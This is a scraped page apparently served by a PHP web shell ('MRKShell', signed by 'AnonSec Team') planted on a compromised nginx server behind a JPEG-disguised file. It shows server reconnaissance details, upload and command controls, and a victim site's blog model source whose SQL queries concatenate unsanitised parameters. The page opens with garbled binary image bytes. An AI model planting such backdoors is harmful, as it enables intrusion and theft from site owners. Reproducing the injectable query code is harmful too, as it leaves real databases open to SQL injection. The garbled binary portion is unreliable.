JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 104.21.73.244  /  Your IP : 172.71.28.168
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/comunicacion/produccion/sitio/application/models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/comunicacion/produccion/sitio/application/models/blog_modelo.php
<?php
class Blog_modelo extends Model
{
	function __construct()
	{
		parent::Model();
	}
	
	public function obtenerPropiedadesBlog($blog_id)
	{
		$sql = "SELECT * FROM blog WHERE seccion_id='".$blog_id."'";
		$query = $this->db->query($sql);
		if ($res = $query->result_array())
		{
			return $res[0];
		}
		else
		{
			return false;
		}
	}
	
	public function dameCategoriasBlog($blog_id)
	{
		$sql="SELECT s.nombre, s.id FROM tag s WHERE s.tipo_id=5 and s.padre_id='".$blog_id."' ORDER BY s.nombre asc";
		$query = $this->db->query($sql);
		if ($res = $query->result_array())
		{
			return $res;
		}
		else
		{
			return false;
		}
	}

	public function dameNotasHomeBlog($start,$limit)
	{
		$sql = "SELECT DISTINCT n.id,n.titulo,n.texto,n.sumario, DATE_FORMAT(n.fechaAlta,\"%d-%m-%Y\") AS fecha,
		DATE_FORMAT(n.fechaAlta,\"%H:%i:%s\") AS hora,n.usuario_id,
				(
					SELECT CONCAT(f.ruta,'tmb1_',f.imagen) 
					FROM foto f 
					INNER JOIN relacion r2 ON (f.id = r2.objeto_id)
					WHERE r2.tipo = 30 AND r2.nota_id = n.id ORDER BY r2.destacado DESC LIMIT 1
				) AS destacada, 
				(
					select CONCAT_WS('|',t.id,t.nombre,t.url) from tag t inner join relacion_tag r on (r.tag_id = t.id and r.tipo=5) 
					where r.nota_id = n.id and t.padre_id=388 limit 1
				) as blog
				FROM nota n 
				INNER JOIN relacion_tag r3 ON (r3.nota_id = n.id AND r3.tipo=5) 
				WHERE n.edicion_id = 0 and n.habilitada=1 ORDER BY n.id desc limit ".$start.", ".$limit;
		
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			foreach ($res as $k => $posts)
			{
				if($posts['blog']!='')

					$res[$k]['autor'] = $this->dameAutorPost($posts['blog']);
				
				else

					$res[$k]['autor'] = '';
			}
			return $res;
		}
		else
			return false;
	}

	//se valida si es null seccion_id ya que venia asi y daba error de sintaxis
	public function dameAutorPost($info)
	{
		$info = explode("|",$info);
		$seccion_id = $info[0];

		if($seccion_id!=""){
			$sql = "select autor,autor_id from blog where seccion_id = ".$seccion_id;
			$query = $this->db->query($sql);
			if ($query->num_rows() > 0)
			{
				$res = $query->result_array();
				return $res[0];
			}
		
			else
				return false;
		}
		else 
			return false;
	}

	public function dameNotasMasComentadasBlog($fecha1,$fecha2,$limit=4)
	{
		
		$sql = "SELECT n.id,n.titulo,
				(
					SELECT CONCAT(f.ruta,'th_',f.imagen) 
					FROM foto f 
					INNER JOIN relacion r2 ON (f.id = r2.objeto_id)
					WHERE r2.tipo = 30 AND r2.nota_id = n.id ORDER BY r2.destacado DESC LIMIT 1
				) AS destacada, 
				(
					select CONCAT_WS('|',t.nombre,t.url) from tag t inner join relacion_tag r on (r.tag_id = t.id and r.tipo=5) 
					where r.nota_id = n.id and t.padre_id=388 limit 1
				) as blog
				FROM nota n 
				INNER JOIN relacion_tag rt on (rt.nota_id = n.id and rt.tipo = 5)
				WHERE n.edicion_id = 0 and n.habilitada=1 and rt.tag_id = 389 and date(n.fechaAlta) between '".$fecha1."' and '".$fecha2."' 
				limit ".$limit;
		
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}
	
	public function dameNotasBlog($blog_id,$cant=0,$inicio=0)
	{
		$sql = "SELECT (SELECT COUNT(c.id) FROM comentario c WHERE c.objeto_id=n.id AND tipo=32) AS cant_comentarios,n.id,n.titulo,n.texto,n.sumario, n.habilitada,n.url,DATE_FORMAT(n.fechaAlta,\"%d-%m-%Y\") AS fecha,
				(
					SELECT CONCAT(f.ruta,'tmb2_',f.imagen) 
					FROM foto f 
					INNER JOIN relacion r2 ON (f.id = r2.objeto_id)
					WHERE r2.tipo = 30 AND r2.nota_id = n.id ORDER BY r2.destacado DESC LIMIT 1
				) AS destacada, n.usuario_id
				FROM nota n 
				INNER JOIN relacion_tag r ON r.nota_id=n.id AND r.tag_id='".$blog_id."' AND r.tipo=5
				WHERE n.edicion_id = 0 and n.habilitada=1 ORDER BY n.id desc";
		
		if($cant<>0)
		{
			$sql .=" LIMIT ".$inicio.",".$cant;
		}
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}
	
	public function dameNotasBlogCategoria($blog_id,$categoria_id,$cant=0,$inicio=0)
	{
		$sql = "SELECT (SELECT COUNT(c.id) FROM comentario c WHERE c.objeto_id=n.id AND tipo=32) AS cant_comentarios,n.id,n.titulo,n.texto,n.habilitada,n.sumario,n.url, DATE_FORMAT(n.fechaAlta,\"%d-%m-%Y\") AS fecha,
				(
					SELECT CONCAT(f.ruta,'tmb2_',f.imagen) 
					FROM foto f 
					INNER JOIN relacion r2 ON (f.id = r2.objeto_id)
					WHERE r2.tipo = 30 AND r2.nota_id = n.id ORDER BY r2.destacado DESC LIMIT 1
				) AS destacada
				FROM nota n 
				INNER JOIN relacion_tag r ON r.nota_id=n.id AND r.tag_id='".$categoria_id."' AND r.tipo=5
				WHERE n.edicion_id = 0 and n.habilitada=1 ORDER BY n.id desc";
		
		if($cant<>0)
		{
			$sql .=" LIMIT ".$inicio.",".$cant;
		}
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}
	
	public function dameUltimosPost($blog_id)
	{
		$sql = "select n.id, n.titulo, n.url, DATE_FORMAT(n.fechaAlta,\"%d-%m-%Y\") AS fecha 
		from nota n 
		inner join relacion_tag r on (r.nota_id = n.id and r.tipo=5) 
		where n.edicion_id = 0 and n.habilitada = 1 and r.tag_id = $blog_id order by n.id desc limit 5";
		
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}

	public function dameNotaBlog($blog_id,$nota_id)
	{
		$sql = "SELECT n.vista,n.titulo,n.texto,n.permisoComent, DATE_FORMAT(n.fechaAlta,\"%d-%m-%Y\") AS fecha, n.usuario_id
				FROM nota n 
				INNER JOIN relacion_tag r ON r.nota_id=n.id AND r.tag_id='".$blog_id."' AND r.tipo=5
				WHERE n.habilitada=1 AND n.id='".$nota_id."'";
		$query = $this->db->query($sql);
		if ($res = $query->result_array())
		{
			return $res[0];
		}
		else
		{
			return false;
		}
	}

	public function dameCompartidas($nota_id)
	{
		$sql = "select compartidas from nota_visitas where nota_id = ".$nota_id;
		$query = $this->db->query($sql);
		if ($res = $query->result_array())
		{
			$res = $query->result_array();
			return $res[0]['compartidas'];
		}
		else
			return 0;
	}

	public function dameListadoBlogs()
	{
		$sql = "SELECT seccion_id, titulo,descripcion,color1,twitter, facebook, nombre_url, nota_id, nota_titulo,autor,url,autor_id,usuario_id FROM blog where habilitada='1' order by fecha_mod desc";
		$query = $this->db->query($sql);
		if ($res = $query->result_array())
		{
			return $res;
		}
		else
		{
			return false;
		}	
	}
	
	public function dameNombreUrl($blog_id)
	{
		$sql = "select nombre_url from blog where seccion_id = ".$blog_id;
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res[0]['nombre_url'];
		}
		else
			return false;
	}

	public function damePostsPorFecha($blog_id, $fecha_inicio, $fecha_fin)
	{
		$sql = "select n.id,n.titulo, DATE_FORMAT(n.fechaAlta,'%d-%m-%Y') AS fecha 
		from nota n 
		inner join relacion_tag rt on (rt.nota_id = n.id and rt.tipo=5) 
		where rt.tag_id = ".$blog_id." and n.edicion_id = 0 and n.habilitada=1 and 
		date(n.fechaAlta) between '".$fecha_inicio."' and '".$fecha_fin."' 
		order by n.id desc limit 15";
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}

	public function dameUltimosComentariosBlog($blog_id, $cant)
	{
		$sql = "SELECT c.comentario, date_format(c.fecha,'%d-%m-%Y') as fecha, date_format(c.fecha,'%H:%i') as hora, u.usuario, u.id as usuario_id, n.id as nota_id, n.titulo, ui.imagen_estado as avatar_estado 
		FROM comentario c 
		INNER JOIN usuario u ON (u.id = c.usuario_id) 
		inner join usuario_info ui on (ui.usuario_id = u.id) 
		INNER JOIN nota n ON (n.id = c.objeto_id AND c.tipo=32 AND n.edicion_id = 0) 
		INNER JOIN relacion_tag rt ON (rt.nota_id = n.id)
		WHERE n.edicion_id = 0 AND c.estado IN (2,3,4) AND rt.tag_id = ".$blog_id."
		ORDER BY c.id DESC
		LIMIT ".$cant;
		$query = $this->db->query($sql);
		if ($query->num_rows() > 0)
		{
			$res = $query->result_array();
			return $res;
		}
		else
			return false;
	}
}
?>

Anon7 - 2022
AnonSec Team